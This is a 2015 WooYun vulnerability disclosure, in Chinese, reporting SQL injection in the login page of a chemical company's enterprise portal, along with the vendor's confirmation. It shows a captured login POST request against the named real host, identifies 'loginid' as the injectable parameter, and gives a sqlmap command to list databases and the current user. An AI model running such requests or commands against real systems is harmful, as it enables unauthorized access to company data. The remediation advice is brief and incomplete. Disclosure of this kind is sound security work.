华润化工信息门户系统存在SQL注入

漏洞概要

缺陷编号:WooYun-2015-0129183

漏洞标题:华润化工信息门户系统存在SQL注入

相关厂商:华润化工控股有限公司

漏洞作者:路人甲

提交时间:2015-07-25 13:05

公开时间:2015-09-10 17:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2015-07-25: 细节已通知厂商并且等待厂商处理中
2015-07-27: 厂商已经确认,细节仅向厂商公开
2015-08-06: 细节向核心白帽子及相关领域专家公开
2015-08-16: 细节向普通白帽子公开
2015-08-26: 细节向实习白帽子公开
2015-09-10: 细节向公众公开

简要描述:

华润化工信息门户系统存在SQL注入

详细说明:

地址:http://eip.crcchem.com/login/Login.jsp?logintype=1提交登录请求,并抓包POSThttp://eip.crcchem.com/login/VerifyLogin.jsp HTTP/1.1Host: eip.crcchem.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://eip.crcchem.com/login/Login.jsp?logintype=1Cookie: testBanCookie=test; JSESSIONID=abcXzrBdSwPC6efj9jd7uConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 254loginfile=%2Fwui%2Ftheme%2Fecology7%2Fpage%2Flogin.jsp%3FtemplateId%3D21%26logintype%3D1%26gopage%3D&logintype=1&fontName=%CE%A2%C8%ED%D1%C5%BA%DA&message=&gopage=&formmethod=post&rnd=&serial=&username=&isie=false&loginid=admin&userpassword=admin&submit=注入点loginid将以上请求存入txt文档,用sqlmap跑下Sqlmap py -r 1s.txt -p "loginid" --dbs --current-user --current-db

漏洞证明:

修复方案:

过滤特殊字符

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-07-2717:33

厂商回复:

暂时还没联系上该系统管理员,加了线程还是慢,不知道里面是什么数据,非常感谢提交

最新状态:

暂无

评价